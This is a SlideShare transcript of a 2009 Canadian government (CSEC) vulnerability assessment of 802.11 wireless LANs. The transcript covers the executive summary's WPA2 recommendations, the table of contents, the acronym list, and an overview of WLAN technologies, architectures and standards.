Your SlideShare is downloading. ×
802.11 Wireless LAN Vulnerability Assessment (ITSPSR-21A)
802.11 Wireless LAN Vulnerability Assessment (ITSPSR-21A)
802.11 Wireless LAN Vulnerability Assessment (ITSPSR-21A)
802.11 Wireless LAN Vulnerability Assessment (ITSPSR-21A)
802.11 Wireless LAN Vulnerability Assessment (ITSPSR-21A)
802.11 Wireless LAN Vulnerability Assessment (ITSPSR-21A)
802.11 Wireless LAN Vulnerability Assessment (ITSPSR-21A)
802.11 Wireless LAN Vulnerability Assessment (ITSPSR-21A)
802.11 Wireless LAN Vulnerability Assessment (ITSPSR-21A)
802.11 Wireless LAN Vulnerability Assessment (ITSPSR-21A)
802.11 Wireless LAN Vulnerability Assessment (ITSPSR-21A)
802.11 Wireless LAN Vulnerability Assessment (ITSPSR-21A)
802.11 Wireless LAN Vulnerability Assessment (ITSPSR-21A)
802.11 Wireless LAN Vulnerability Assessment (ITSPSR-21A)
802.11 Wireless LAN Vulnerability Assessment (ITSPSR-21A)
802.11 Wireless LAN Vulnerability Assessment (ITSPSR-21A)
802.11 Wireless LAN Vulnerability Assessment (ITSPSR-21A)
802.11 Wireless LAN Vulnerability Assessment (ITSPSR-21A)
802.11 Wireless LAN Vulnerability Assessment (ITSPSR-21A)
802.11 Wireless LAN Vulnerability Assessment (ITSPSR-21A)
802.11 Wireless LAN Vulnerability Assessment (ITSPSR-21A)
802.11 Wireless LAN Vulnerability Assessment (ITSPSR-21A)
802.11 Wireless LAN Vulnerability Assessment (ITSPSR-21A)
802.11 Wireless LAN Vulnerability Assessment (ITSPSR-21A)
802.11 Wireless LAN Vulnerability Assessment (ITSPSR-21A)
802.11 Wireless LAN Vulnerability Assessment (ITSPSR-21A)
802.11 Wireless LAN Vulnerability Assessment (ITSPSR-21A)
802.11 Wireless LAN Vulnerability Assessment (ITSPSR-21A)
802.11 Wireless LAN Vulnerability Assessment (ITSPSR-21A)
802.11 Wireless LAN Vulnerability Assessment (ITSPSR-21A)
802.11 Wireless LAN Vulnerability Assessment (ITSPSR-21A)
802.11 Wireless LAN Vulnerability Assessment (ITSPSR-21A)
802.11 Wireless LAN Vulnerability Assessment (ITSPSR-21A)
802.11 Wireless LAN Vulnerability Assessment (ITSPSR-21A)
802.11 Wireless LAN Vulnerability Assessment (ITSPSR-21A)
802.11 Wireless LAN Vulnerability Assessment (ITSPSR-21A)
802.11 Wireless LAN Vulnerability Assessment (ITSPSR-21A)
802.11 Wireless LAN Vulnerability Assessment (ITSPSR-21A)
802.11 Wireless LAN Vulnerability Assessment (ITSPSR-21A)
802.11 Wireless LAN Vulnerability Assessment (ITSPSR-21A)
802.11 Wireless LAN Vulnerability Assessment (ITSPSR-21A)
802.11 Wireless LAN Vulnerability Assessment (ITSPSR-21A)
802.11 Wireless LAN Vulnerability Assessment (ITSPSR-21A)
802.11 Wireless LAN Vulnerability Assessment (ITSPSR-21A)
802.11 Wireless LAN Vulnerability Assessment (ITSPSR-21A)
802.11 Wireless LAN Vulnerability Assessment (ITSPSR-21A)
802.11 Wireless LAN Vulnerability Assessment (ITSPSR-21A)
802.11 Wireless LAN Vulnerability Assessment (ITSPSR-21A)
802.11 Wireless LAN Vulnerability Assessment (ITSPSR-21A)
802.11 Wireless LAN Vulnerability Assessment (ITSPSR-21A)
802.11 Wireless LAN Vulnerability Assessment (ITSPSR-21A)
802.11 Wireless LAN Vulnerability Assessment (ITSPSR-21A)
802.11 Wireless LAN Vulnerability Assessment (ITSPSR-21A)
802.11 Wireless LAN Vulnerability Assessment (ITSPSR-21A)
802.11 Wireless LAN Vulnerability Assessment (ITSPSR-21A)
802.11 Wireless LAN Vulnerability Assessment (ITSPSR-21A)
802.11 Wireless LAN Vulnerability Assessment (ITSPSR-21A)
802.11 Wireless LAN Vulnerability Assessment (ITSPSR-21A)
802.11 Wireless LAN Vulnerability Assessment (ITSPSR-21A)
802.11 Wireless LAN Vulnerability Assessment (ITSPSR-21A)
Upcoming SlideShare
Loading in...5
×

Thanks for flagging this SlideShare!

Oops! An error has occurred.

×
Saving this for later? Get the SlideShare app to save on your phone or tablet. Read anywhere, anytime – even offline.
Text the download link to your phone
Standard text messaging rates apply

802.11 Wireless LAN Vulnerability Assessment (ITSPSR-21A)

1,917

Published on

802.11 Wireless LAN Vulnerability Assessment (ITSPSR-21A)

802.11 Wireless LAN Vulnerability Assessment (ITSPSR-21A)

0 Comments
0 Likes
Statistics
Notes
  • Be the first to comment

  • Be the first to like this

No Downloads
Views
Total Views
1,917
On Slideshare
0
From Embeds
0
Number of Embeds
0
Actions
Shares
0
Downloads
78
Comments
0
Likes
0
Embeds 0
No embeds

Report content
Flagged as inappropriate Flag as inappropriate
Flag as inappropriate

Select your reason for flagging this presentation as inappropriate.

Cancel
No notes for slide

Transcript

  • 1. UNCLASSIFIED IT SECURITY TECHNICAL PUBLICATION802.11 Wireless LAN Vulnerability Assessment (ITSPSR-21A) ITSPSR-21A May 2009 May 2009
  • 2. UNCLASSIFIED 802.11 Wireless LAN Vulnerability Assessment (ITSPSR-21A)This page intentionally left blank. May 2009
  • 3. UNCLASSIFIED802.11 Wireless LAN Vulnerability Assessment (ITSPSR-21A)ForewordThe 802.11 Wireless LAN Vulnerability Assessment (ITSPSR-21A) is anUNCLASSIFIED publication, issued under the authority of the Chief, CommunicationsSecurity Establishment Canada (CSEC).Suggestions for amendments should be forwarded through departmentalcommunications security channels to your Client Services Representative at CSEC.Requests for additional copies or changes in distribution should be directed to yourClient Services Representative at CSEC.For further information, please contact CSEC’s ITS Client Services area by e-mail atclient.svcs@cse-cst.gc.ca or call (613) 991-7600.Effective DateThis publication takes effect on May 1st, 2009. ____________________________________________________ Gwen Beauchemin Director, Mission Management Government of Canada, Communications Security Establishment Canada © 2009It is not permissible to make copies or extracts from this publication without the written consent of CSEC.Foreword May 2009 i
  • 4. UNCLASSIFIED 802.11 Wireless LAN Vulnerability Assessment (ITSPSR-21A) This page intentionally left blank.ii May 2009
  • 5. UNCLASSIFIED802.11 Wireless LAN Vulnerability Assessment (ITSPSR-21A)Executive SummaryWLAN devices based on the IEEE 802.11 standard have a number of vulnerabilities related tothe fact that wireless signals are sent over the air rather than through closed wiring paths. InWLANs, network traffic is broadcast into uncontrolled public spaces, which may result in thecompromise of sensitive information. Additionally, signals from unauthorized external sourcesmay easily enter the network, allowing attackers to join the network as though they were bona-fide users. This creates risks not only for the WLAN but also for any other network to which it isconnected. These risks may also arise on traditional wired networks because it is easy andinexpensive for users to install their own WLAN devices without the knowledge or consent ofnetwork authorities. The risk of outside attack is very high: activities such as “war driving” andfree, simple-to-use software tools for discovering and exploiting WLANs are readily availableand may allow outsiders to penetrate the network.The 802.11 standard originally included provision for a security scheme known as WiredEquivalent Privacy (WEP), which provided some protection against casual interception ofnetwork traffic or insertion of unauthorized traffic. However, WEP suffered from serious designweaknesses that made it vulnerable to hacker exploitation tools. Recent 802.11 revisions includeimproved security mechanisms in the form of Wi-Fi Protected Access (WPA) and 802.11i (alsocalled WPA2). WPA2 addresses the weaknesses in previous schemes and features strong, AES-based encryption (some brands/models of WLAN APs carry FIPS140-2 certification), as well as802.1X enterprise authentication features allowing WLAN access authentication to be integratedwith existing corporate user authentication mechanisms (smart cards, tokens, PKI, biometrics,etc). Practical attacks against WPA2 are few and primarily targeted at Pre-Shared Key (PSK)deployments.Note that these security features are usually turned off by default, and must be enabled to haveany effect: WLANs deployed without enabling security features leave the network wide open todiscovery and attack.CSEC recommends that WPA2 security be mandatory with 802.1X authentication whereverpossible for all unclassified WLAN deployments within the Government of Canada. Olderequipment not supporting WPA2 must be replaced or upgraded. In instances where especiallysensitive information may be transferred over a WLAN, additional security measures such asend-to-end encryption or VPNs should also be deployed. Other essential protection measuresinclude network monitoring for unusual traffic and to detect the installation of unauthorizedwireless devices.CSEC is in the process of developing a comprehensive security solution to mitigate the risk of802.11 WLAN technology. This solution will combine a variety of measures including the use ofFirewalls, Virtual Private Network (VPN) encryption and strong authentication, whichdepartments should deploy to isolate WLANs from sensitive government networks.Executive Summary May 2009 iii
  • 6. UNCLASSIFIED 802.11 Wireless LAN Vulnerability Assessment (ITSPSR-21A) This page intentionally left blank.iv May 2009
  • 7. UNCLASSIFIED802.11 Wireless LAN Vulnerability Assessment (ITSPSR-21A)Revision History Document No. Title Release Date ITSPSR-21 802.11 Wireless LAN Vulnerability Assessment November 2002Revision History May 2009 v
  • 8. UNCLASSIFIED 802.11 Wireless LAN Vulnerability Assessment (ITSPSR-21A) This page intentionally left blank.vi May 2009
  • 9. UNCLASSIFIED802.11 Wireless LAN Vulnerability Assessment (ITSPSR-21A)Table of ContentsForeword......................................................................................................................... iEffective Date ................................................................................................................. iExecutive Summary ..................................................................................................... iiiRevision History ............................................................................................................ vTable of Contents ........................................................................................................ viiList of Abbreviations and Acronyms.......................................................................... xi1 Introduction ........................................................................................................... 1 1.1 Background .................................................................................................. 1 1.2 Purpose ........................................................................................................ 1 1.3 Scope ........................................................................................................... 1 1.4 Document Structure ..................................................................................... 12 802.11 WLAN System Overview ........................................................................... 3 2.1 Technology................................................................................................... 3 2.1.1 Background........................................................................................ 3 2.1.2 Infrared (IR) Technology .................................................................... 3 2.1.3 Radio Frequency (RF) Technology .................................................... 4 2.2 Architecture .................................................................................................. 5 2.2.1 General .............................................................................................. 5 2.2.2 Ad Hoc Mode ..................................................................................... 5 2.2.3 Infrastructure Mode............................................................................ 6 2.2.4 Distribution System Mode .................................................................. 6 2.2.5 Wireless Distribution System Mode ................................................... 7 2.2.6 Wireless Mesh Networks ................................................................... 7 2.3 WLAN Standards.......................................................................................... 8 2.4 IEEE 802.11 Standards .............................................................................. 10 2.4.1 Background...................................................................................... 10 2.4.2 IEEE 802.11 Task Groups/Amendments ......................................... 10 2.5 Wi-Fi™ Interoperability Standard ............................................................... 12 2.5.1 Wireless Ethernet Compatibility Alliance (WECA) and the Wi-Fi Alliance ............................................................................................ 123 Security Mechanisms.......................................................................................... 17 3.1 General....................................................................................................... 17 3.2 Access Control ........................................................................................... 17 3.2.1 General ............................................................................................ 17 3.2.2 Service Set Identifier (SSID) ............................................................ 17 3.2.3 MAC Address Access Control List (ACL)......................................... 18 3.3 Authentication Services .............................................................................. 18Table of Contents May 2009 vii
  • 10. UNCLASSIFIED 802.11 Wireless LAN Vulnerability Assessment (ITSPSR-21A) 3.3.1 General ............................................................................................ 18 3.3.2 Open System Authentication ........................................................... 18 3.3.3 Shared Key Authentication .............................................................. 19 3.3.4 802.1X Authentication...................................................................... 19 3.4 Data Confidentiality and WEP/WPA/802.11i/WPA2 ................................... 21 3.4.1 General ............................................................................................ 21 3.4.2 Wired Equivalent Privacy (WEP) Protocol ....................................... 21 3.4.3 Wi-Fi Protected Access (WPA) ........................................................ 22 3.4.4 IEEE 802.11i/Wi-Fi Protected Access version 2 (WPA2)................. 234 Vulnerabilities...................................................................................................... 25 4.1 Access Control Vulnerabilities .................................................................... 25 4.1.1 General ............................................................................................ 25 4.1.2 SSID ................................................................................................ 25 4.1.3 MAC Address Access Control List (ACL)......................................... 25 4.2 Authentication Mechanism Vulnerabilities .................................................. 25 4.2.1 General ............................................................................................ 25 4.2.2 Shared Key Authentication Flaw...................................................... 25 4.2.3 802.1X/EAP Vulnerabilities .............................................................. 26 4.3 WEP Vulnerabilities .................................................................................... 26 4.3.1 General ............................................................................................ 26 4.3.2 Keystream Re-use ........................................................................... 26 4.3.3 Message Integrity ............................................................................ 26 4.3.4 Key Management............................................................................. 26 4.4 WPA/WPA2 Vulnerabilities......................................................................... 27 4.4.1 General ............................................................................................ 27 4.4.2 Key Management............................................................................. 27 4.4.3 4-Way Handshake and Weak Passphrase Vulnerability .................. 27 4.4.4 WPA MIC Spoofing Countermeasure .............................................. 28 4.5 Configuration Defaults ................................................................................ 28 4.6 Simple Network Management Protocol (SNMP)......................................... 285 Exploits ................................................................................................................ 29 5.1 Network Discovery and Access Attacks ..................................................... 29 5.1.1 General ............................................................................................ 29 5.1.2 Network Discovery........................................................................... 29 5.1.3 Network Access via Wireless Router ............................................... 29 5.2 Denial of Service (DoS) Attacks ................................................................. 30 5.2.1 General ............................................................................................ 30 5.2.2 AP Takeover .................................................................................... 30 5.2.3 AP Cloning....................................................................................... 30 5.2.4 RF Jamming .................................................................................... 30 5.3 WEP Protocol Attack .................................................................................. 31 5.3.1 General ............................................................................................ 31viii May 2009
  • 11. UNCLASSIFIED802.11 Wireless LAN Vulnerability Assessment (ITSPSR-21A) 5.3.2 Passive Attack ................................................................................. 31 5.3.3 Active Attacks .................................................................................. 31 5.3.4 Decryption Table Attack................................................................... 32 5.4 WPA/WPA2 Attacks ................................................................................... 32 5.4.1 General ............................................................................................ 32 5.4.2 Pre-Shared Key Dictionary Attack ................................................... 32 5.5 Monitoring and Interception Attacks ........................................................... 32 5.5.1 General ............................................................................................ 32 5.5.2 Traffic Sniffing.................................................................................. 33 5.5.3 Broadcast Monitoring ....................................................................... 33 5.5.4 Man-in-the-Middle Attack ................................................................. 336 Solutions.............................................................................................................. 35 6.1 Overview .................................................................................................... 35 6.2 Determine Range of Your Network Coverage ............................................ 35 6.3 Do Not Broadcast Your SSID ..................................................................... 36 6.4 Do Not Use the Default SSID ..................................................................... 36 6.5 Use WPA2.................................................................................................. 36 6.6 Use 802.1X Server-based Authentication................................................... 37 6.7 Change the Key Frequently........................................................................ 37 6.8 Use a VPN and Firewall to Isolate the WLAN............................................. 37 6.9 Use a Personal Firewall on Every Wireless Client...................................... 37 6.10 Consider Wireless Intrusion Detection/Prevention Systems....................... 377 Future Work ......................................................................................................... 398 Conclusions and Recommendations ................................................................ 419 References........................................................................................................... 43Table of Contents May 2009 ix
  • 12. UNCLASSIFIED 802.11 Wireless LAN Vulnerability Assessment (ITSPSR-21A) This page intentionally left blank.x May 2009
  • 13. UNCLASSIFIED802.11 Wireless LAN Vulnerability Assessment (ITSPSR-21A)List of Abbreviations and AcronymsAES Advanced Encryption StandardACL Access Control ListAP Access PointARP Address Resolution ProtocolATM Asynchronous Transfer ModeBSS Basic Service SetCBC Cipher Block Chaining modeCCMP Counter-mode with CBC-MAC ProtocolCRC Cyclic Redundancy ChecksumCSEC Communications Security Establishment CanadaDHCP Dynamic Host Configuration ProtocolDES Data Encryption Standard3DES Triple DESDoS Denial of ServiceDSSS Direct Sequence Spread SpectrumEAP Extensible Authentication ProtocolESS Extended Service SetETSI European Telecommunications Standards InstituteFCC Federal Communications CommissionFHSS Frequency-Hopping Spread SpectrumFIPS Federal Information Processing Standards (USA)GC Government of CanadaGHz GigaHertzGPS Global Positioning SystemHiperLAN High Performance Radio Local Area Network (ETSI)IBSS Independent Basic Service SetIEC International Electrotechnical CommissionIEEE Institute of Electrical and Electronics EngineersIP Internet ProtocolIR InfraredIrDA Infrared Data AssociationISM Industrial, Scientific And MedicalISO International Organization For StandardizationIT Information TechnologyITS Information Technology SecurityIV Initialization VectorList of Abbreviations and Acronyms May 2009 xi
  • 14. UNCLASSIFIED 802.11 Wireless LAN Vulnerability Assessment (ITSPSR-21A)LAN Local Area NetworkMAC Medium Access Control (IP) or Message Authentication Code (Crypto)MAN Metropolitan Area NetworkMbps Megabits per SecondMIC Message Integrity CodeMIMO Multiple-Input/Multiple-OutputNAI Network Access IdentifierOCB Offset Code BookOFDM Orthogonal Frequency Division MultiplexingOSI Open Systems InterconnectionPHY Physical (Layer)PMK Pairwise Master KeyPKI Public Key InfrastructurePPP Point-to-Point ProtocolPRNG Pseudo-Random Number GeneratorPSK Pre-Shared KeyPTK Pairwise Transient KeyRC4 Rivest Cipher 4/Ron’s Code 4 (Encryption Algorithm)RF Radio FrequencyRSN Robust Security NetworkSNMP Simple Network Management ProtocolSSH Secure ShellSSID Service Set IdentifierTKIP Temporal Key Integrity ProtocolTMTO Time-Memory Trade-OffUMTS Universal Mobile Telecommunications SystemVPN Virtual Private NetworkWAN Wide Area NetworkWECA Wireless Ethernet Compatibility Alliance (see also WFA)WEP Wired Equivalent PrivacyWFA Wi-Fi Alliance (new name for WECA)WIDS Wireless Intrusion Detection SystemWi-Fi™ Wireless Fidelity, a Trademark of the Wi-Fi AllianceWIPS Wireless Intrusion Prevention SystemWLAN Wireless Local Area NetworkWPA Wi-Fi Protected AccessWPA2 Wi-Fi Protected Access version 2xii May 2009
  • 15. UNCLASSIFIED802.11 Wireless LAN Vulnerability Assessment (ITSPSR-21A)WPAN Wireless Personal Area NetworkWRAP Wireless Robust Authenticated ProtocolXOR Exclusive ORList of Abbreviations and Acronyms May 2009 xiii
  • 16. UNCLASSIFIED 802.11 Wireless LAN Vulnerability Assessment (ITSPSR-21A) This page intentionally left blank.xiv May 2009
  • 17. UNCLASSIFIED802.11 Wireless LAN Vulnerability Assessment (ITSPSR-21A)1 Introduction1.1 BackgroundWith the rapidly increasing adoption of 802.11 technology, WLAN products have becomemainstream and increasingly common in business, education, and home environments. Theenhanced mobility and productivity offered by wireless technology, along with the long-termcost saving and ease of installation, have attracted organizations to make the move to thisinnovative technology. However, both federal departments and private companies are deployingwireless networks often without fully understanding the security risks associated with their use.1.2 PurposeThis report provides vulnerabilities and solutions for the use of an 802.11 WLAN in the federalgovernment environment. It is based on an analysis of the information discovered in the testlaboratory at CSEC and information currently available through open sources such asmanufacturers, and technological organizations and associations. The primary goal of thisvulnerability assessment report is to provide government clients with a better understanding ofthe risks involved prior to developing plans for wireless network deployments.1.3 ScopeThis report focuses on the main commercially available variants of the WLAN standard:802.11b, g and the soon-to-be-approved 802.11n. Their present popularity, relative maturity andthe wide availability of products make the aforementioned versions of the standard the bestmodels for vulnerability assessment of the 802.11 WLAN technology. It must be pointed out,however, that most of the information that is provided in this document is not exclusive to802.11b/g/n but also applies to 802.11a and other 802.11 WLAN standards to various degrees.1.4 Document StructureThis report provides a brief overview of the WLAN architectures and the IEEE 802.11 standardthat dominates the WLAN market today, followed by an explanation of the security mechanisms,the vulnerabilities of these mechanisms and some commonly known 802.11 exploits. Interimsteps to mitigate the problems are also included.Introduction September 2008 1
  • 18. UNCLASSIFIED 802.11 Wireless LAN Vulnerability Assessment (ITSPSR-21A) This page intentionally left blank.2 May 2009
  • 19. UNCLASSIFIED802.11 Wireless LAN Vulnerability Assessment (ITSPSR-21A)2 802.11 WLAN System Overview2.1 Technology2.1.1 BackgroundUnlike conventional LANs, which rely on physical connections of copper wire or optical fibre totransport information, Wireless LANs (WLANs) use infrared (IR) light or radio frequency (RF)electromagnetic waves to transmit and receive data. Wireless technology provides all of thefunctionality of wired LANs but removes the physical constraints imposed by the need to hard-wire the user community. This simplifies and speeds up network installation and increasesflexibility and scalability, while allowing greater user mobility. These advantages, combinedwith the ever-increasing data bandwidth offered by wireless technology, make WLANs anattractive alternative for individuals and organizations that plan to implement or expand a LANwithout having to install or move wires.In a WLAN environment, each computer that requires over the air connectivity must be equippedwith a WLAN adapter. These adapters normally take the form of plug-in cards for installation inthe expansion slots of desktop computers, PC Cards or USB dongles for installation in theappropriate slots of notebooks and laptops. These cards and adapters are simply networkinterface cards with a built in radio transceiver and a miniature antenna that provide the RFcommunication link (or in the case of IR-based WLANs, an infrared emitter/detector pair).Virtually all recent laptop models come with some variety of WLAN built-in (one or more of:IR, 802.11, Bluetooth). While this practice increases the convenience and eliminates the numberof additional cards and adapters that must be carried by the user, it adds the complication that inmost cases, such built-in WLAN hardware cannot be easily upgraded to take advantage of newsecurity or user features.2.1.2 Infrared (IR) TechnologyIR is used in a variety of Information Technology (IT) applications including WLANs andwireless interfaces for connecting computer and peripheral devices, commonly known as serialIR links. IR was originally a non-standardized technology, with each vendor and equipmentmanufacturer implementing a proprietary protocol; however the Infrared Data Association(IrDA) was quickly formed to produce a set of standards governing IR computer connectivity.The IrDA Data standard addresses the use of IR for high speed, short range, line-of-sight, andpoint-to-point wireless data transfer. The IrDA Control standard covers the communicationsbetween PCs and wireless peripherals such as the keyboard or mouse. Laser technology is alsoemployed to establish optical data links capable of transmitting information in a direct line-of-sight for distances of several kilometers.The legacy IEEE 802.11 standard also defines the use of infrared as a transmission technology;however, no commercial 802.11 IR products are known to have been developed and this portionof the standard has not been updated since the initial release of the standard in 1997.802.11 WLAN System Overview May 2009 3
  • 20. UNCLASSIFIED 802.11 Wireless LAN Vulnerability Assessment (ITSPSR-21A)2.1.3 Radio Frequency (RF) Technology2.1.3.1 GeneralRF has become the de-facto technology for the majority of today’s WLANs. Radio signals cantravel in all directions for distances ranging from a few metres to several kilometers. Thesecharacteristics can be very practical in situations where wide or long-range coverage is requiredbut they become problematic when the signal’s propagation needs to be limited. The fact thatthe destination of radio signals cannot be precisely controlled makes this medium the mostvulnerable to undetected interception and exploitation. All unprotected radio traffic can bemonitored with widely available radio equipment by anyone located within the range of thetransmitter; however it is important to note that amplifiers and specialized antennas can also beused solely at the receiver site to increase the effective range of radio signals, therefore simplycontrolling the transmitter power is not sufficient to limit the propagation of signals. Forexample, the use of RF wireless computer keyboards should be avoided for the processing ofsensitive information since they broadcast the information that is typed on them, and eventhough the transmit power is comparatively low, this information may be still be intercepted atrange. In addition to signal interception, RF communications are also subject to spurious anddeliberate electromagnetic interference that can result in the inability to communicate.2.1.3.2 Spread SpectrumThe development of spread-spectrum communications technology has been claimed to havealleviated the vulnerabilities of standard RF transmission: Unlike narrowband systems thattransmit a powerful signal on a single frequency, spread-spectrum systems transmit a low powersignal over a broad range of frequencies. The signal is spread according to pre-establishedparameters or patterns that must also be known by the receiver so that it can recover the signal.This transmission technique provides more resistance to noise and interference and is lessvulnerable to jamming and casual interception. In the case of WLANs, the hardware must beaware of the signal spreading parameters in order to receive a spread-spectrum signal, so theseparameters are pre-programmed into the hardware chipsets used to build these products.Although these chipset were intended to be developed into standalone WLAN AP andworkstation hardware, it is inevitable that tools and methods are developed for exploiting thesepre-programmed receivers for the purpose of intercepting spread-spectrum WLANcommunications. Many such tools are freely available on the Internet, and therefore none of thespread spectrum technologies should be considered to be sufficient to secure a WLAN.Several signal-spreading schemes have been developed but the methods that prevail in theWLAN domain are: 1. Frequency Hopping Spread Spectrum (FHSS) 2. Direct Sequence Spread Spectrum (DSSS) and 3. Orthogonal Frequency Division Multiplexing (OFDM)4 May 2009
  • 21. UNCLASSIFIED802.11 Wireless LAN Vulnerability Assessment (ITSPSR-21A)FHSS and DSSS are the original spread-spectrum technologies employed in 802.11 WLANs.The concept of expanding spectral use through frequency hopping is fairly self-explanatory;DSSS is based on the mathematical principle of convolution and provides a greater datathroughput and a higher immunity to interference than FHSS. OFDM is a multi-carrier widebandmodulation scheme introduced in the 802.11g revision and provides even greater data throughputand is much more resistant to interference than the previous schemes. 802.11n introducesOFDM+MIMO, which continues to use the same 2.4 GHz frequency band and basic modulationscheme of OFDM, but adds techniques for using multiple transmitters and receivers while takinginto account temporal and spatial characterization of the RF environment. This effectivelyincreases the available bandwidth using a practice known as “channel bonding” (combiningmultiple adjacent channels into one large channel) to further increase range and throughput.2.2 Architecture2.2.1 GeneralThere are five forms of wireless network architectures currently allowed in the overall 802.11standard: Ad-Hoc Mode, Infrastructure Mode, Distribution System Mode, Wireless DistributionSystem mode and Wireless Mesh.2.2.2 Ad Hoc ModeIn the ad-hoc mode, as illustrated in Figure 1, wireless devices create a LAN by communicatingfreely and directly with each other without a centralized base station. This architecture is alsoreferred to as the peer-to-peer network or the Independent Basic Service Set (IBSS). Thisnetwork structure is easy to implement as it requires no infrastructure and minimaladministration but the transfer of information is limited to the propagation range of thetransmitting device. Figure 1 - WLAN in Ad Hoc Mode802.11 WLAN System Overview May 2009 5
  • 22. UNCLASSIFIED 802.11 Wireless LAN Vulnerability Assessment (ITSPSR-21A)2.2.3 Infrastructure ModeIn the more commonly used infrastructure mode, the network is built around a central basestation, or Access Point (AP). The information transmitted by the originating device is receivedby the AP and routed to the proper destination. As illustrated in Figure 2, the AP is physicallyconnected to the wired LAN’s backbone and it provides the communication link between thewireless client devices and any of the wired network devices. The AP also functions as a radiorelay capable of forwarding information to/from wireless devices that are too distant tocommunicate directly with each other. The infrastructure mode is referred to as the Basic ServiceSet (BSS). Figure 2 - WLAN in Infrastructure Mode2.2.4 Distribution System ModeThe distribution system mode is also referred to as Extended Service Set (ESS) mode. In thedistribution system mode, multiple APs are connected to the wired network by a switching orbridging device, enabling a WLAN client to roam between APs, thus providing greater range andmobility. Roaming capability is also provided to mobile users. Note that the roaming capabilityrequires special AP support and may not be available on all brands/models of AP. Additionally,the inter-AP communication required to support wireless roaming is not covered by the 802.11standard as it is a higher layer protocol and most manufacturers either do not implement thisfeature or utilize a proprietary protocol; thus in general, roaming between different brands of APis not possible, even though they may be connected to the same network.In an 802.11 WLAN system operating in distribution mode, as a user moves around and out ofrange of an AP, the user’s mobile device will re-associate with the next AP in the extended set.Therefore it will remain “connected” to the network and able to start and receive newconnections on the new AP. However, without dedicated AP roaming support, any existingopen network sessions on the old AP will generally not follow the user to the new AP (unless theparticular application in use by the user has its own roaming capability). This LAN structure ismore complex and in the case of RF-based wireless devices, requires careful frequency orchannel management so that APs do not interfere with each other.6 May 2009
  • 23. UNCLASSIFIED802.11 Wireless LAN Vulnerability Assessment (ITSPSR-21A) Figure 3 - WLAN in Distribution System Mode2.2.5 Wireless Distribution System ModeIn the Wireless Distribution System (WDS) mode, a wireless link is used to interconnectmultiple APs, allowing the wireless network to be expanded without the need for wiredinfrastructure. The reduction in wired infrastructure allowed by WDS comes at the expense ofthroughput. Because each AP must re-broadcast any received WDS traffic in a “repeater”-likefashion, wireless throughput is cut approximately in half for each hop that a message must travelover, so that wireless clients at the end of a long string of WDS-connected APs may see verypoor throughput. Additionally, like the wireless roaming functionality discussed previously,WDS requires Layer 3 and 4 interaction to manage the routing and this aspect is not standardizedunder 802.11, which deals primarily with Layers 1 and 2, and thus WDS may be incompatiblebetween different brands of AP. Finally, in WDS, all APs in the chain must share the same radiochannel and security keys, therefore dynamically assigned encryption keys (e.g. enterpriseWPA/WPA2) are generally not supported over a WDS connection. Figure 4 - WLAN in Wireless Distribution System Mode2.2.6 Wireless Mesh NetworksWireless mesh networks combine features of ad-hoc wireless networks, as well as infrastructurewireless networks in wireless distribution system mode. The result is a robust wirelessinfrastructure network that may be deployed with minimal wiring and cabling costs but is nolonger just confined to a local area, but normally extend to Metropolitan Area Network (MAN)or Wide Area Network (WAN) scales.Wireless mesh networks products have been previously released under proprietary standards, but802.11 WLAN System Overview May 2009 7
  • 24. UNCLASSIFIED 802.11 Wireless LAN Vulnerability Assessment (ITSPSR-21A)have begun to converge under the banner of the Wi-Mesh Alliance and the proposed 802.11sstandard. This standard allows both wireless mesh ad-hoc networks and wireless meshinfrastructure networks and defines the routing protocols needed to make the system work.Security for the proposed standard includes the definition of 802.11i, but adds enhancements todeal with re-keying and authentication issues in this architecture. Figure 5 - WLAN in Wireless Mesh Mode2.3 WLAN StandardsWireless networking technology has matured through the development of proprietary systems byvarious manufacturers. In the absence of formal standards, many manufacturers introduced theirown, however most of these proprietary systems have been superseded by systems based on thevarious IEEE standards. Table 1 identifies some of the leading and competing standards andlists some of their specifications and intended applications. The products that are offered undermost of these proprietary standards are not interoperable. Another issue is the opportunity forinterference among the products from the different manufacturers causing a reduction in datathroughput. Because many standards use the same unlicensed frequency band, spread-spectrumtechnology cannot completely eliminate the possibility of packet collisions.In addition to the standards described on the table, still other wireless networking standards arein use. These standards are unrelated to 802.11 and are intended to meet different needs andinclude standards for Wireless USB (IEEE 802.15.3), ZigBee Industrial Control (802.15.4), orstandards for WiMAX wireless metropolitan area networks (802.16e).8 May 2009
  • 25. UNCLASSIFIED 802.11 Wireless LAN Vulnerability Assessment (ITSPSR-21A) Table 1 – Key WLAN Standards IEEE 802.11 802.11b 802.11a 802.11g 802.11n HiperLAN HiperLAN/2 HomeRF IEEE 802.15.1 (Draft 2.0) (ETSI) (ETSI) BluetoothFrequency 2.4 GHz 2.4 GHz 5 GHz 2.4 GHz 2.4 GHz 2.4 GHz 5 GHz 2.4 GHz 2.4 GHzRF Technology FHSS or DSSS DSSS OFDM OFDM OFDM+MIMO Single carrier Single carrier FHSS FHSSMax Transfer Rate 2 Mbps 11 Mbps 54 Mbps 54 Mbps 248 Mbps 23 Mbps up to 54 Mbps 1.6 Mbps 1 MbpsTypical Outdoor 100 metres 150 metres 120 metres 150 metres 250 metres 100 metres 100 metres 50 metres 10 metresRangeSecurity Wired Wired Wired Wired Wired NAI/IEEE NAI/IEEE Optional Challenge- Equivalent Equivalent Equivalent Equivalent Equivalent address/ address/X.509 response using Protection Protection Protection Protection Protection X.509 secret key (WEP) (WEP) + (WEP) + (WEP) / WiFi (WEP) / WiFi (Bluetooth 1.0- optional WiFi optional WiFi Protected Protected 2.0), Elliptic Protected Protected Access (WPA/) / Access Curve Diffie- Access (WPA) Access 802.11i (WPA2) (WPA/) / Hellman (WPA) 802.11i (Bluetooth 2.1) (WPA2)Encryption 40-bit RC4 up to 104-bit up to 104-bit up to 104-bit up to 104-bit DES, 3DES DES, 3DES 128-bit 128-bit E0 RC4 (WEP), RC4 (WEP), RC4 (WEP), RC4 (WEP), Cipher, 128-bit 128-bit RC4 w/ 128-bit RC4 128-bit RC4 w/ 128-bit RC4 w/ SAFER+, ECDH TKIP key w/ TKIP key TKIP key TKIP key (in version 2.1 scheduling scheduling scheduling scheduling and later) (WPA) (WPA) (WPA), 128-bit (WPA), 128-bit AES (WPA2) AES (WPA2)Fixed network Ethernet Ethernet Ethernet Ethernet Ethernet Ethernet Ethernet, Ethernet PPP, Ethernetsupport IP, ATM, UMTS, FireWire, PPP 5Applications Wireless Data Wireless Wireless Data Wireless Data Wireless Data Wireless Data Wireless Cable Data Wireless Data Replacement Multimedia Wireless Wireless Data voice Wireless Voice 802.11 WLAN System Overview May 2009 9
